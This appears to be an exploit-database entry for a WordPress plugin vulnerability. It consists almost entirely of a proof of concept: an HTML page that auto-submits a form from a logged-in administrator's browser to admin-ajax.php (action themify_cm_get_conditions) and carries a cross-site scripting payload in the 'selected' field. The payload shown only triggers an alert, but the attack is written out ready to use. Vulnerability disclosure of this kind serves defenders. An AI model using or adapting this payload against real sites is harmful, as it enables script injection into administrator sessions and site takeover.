Share
## https://sploitus.com/exploit?id=WPEX-ID:506ECEE9-8E42-46DE-9C5C-FC252AB2646E
Make a logged in admin open a page with the HTML code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=themify_cm_get_conditions" method="POST">
        <input type="text" name="selected" value='"><svg/onload=alert(/XSS/)>'>
        <input type="submit" value="submit">
    </form>
  </body>
</html>